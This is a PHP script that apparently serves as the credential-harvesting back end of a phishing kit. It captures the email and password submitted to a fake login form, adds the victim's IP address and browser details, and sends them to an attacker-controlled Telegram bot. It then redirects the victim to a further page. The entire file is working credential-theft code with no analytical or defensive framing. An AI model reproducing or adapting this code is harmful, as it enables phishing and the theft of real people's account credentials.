<?php
include '../token.php';

$zabi = getenv("REMOTE_ADDR");
$message = " »✓ Login 🇵🇱\n\n";
$message .= "»email : ".$_POST['email']."\n";
$message .= "»Pass : ".$_POST['pass']."\n";
$message .= "----------- IP Infos -------\n\n";
$message .= "IP       : $zabi\n";
$message .= "BROWSER  : ".$_SERVER['HTTP_USER_AGENT']."\n";

$data = [
    'text' => $message,
    'chat_id' => $chat_id
];

file_get_contents("https://api.telegram.org/bot$token/sendMessage?" . http_build_query($data));

header("Location: ../info.php");
exit();
?>
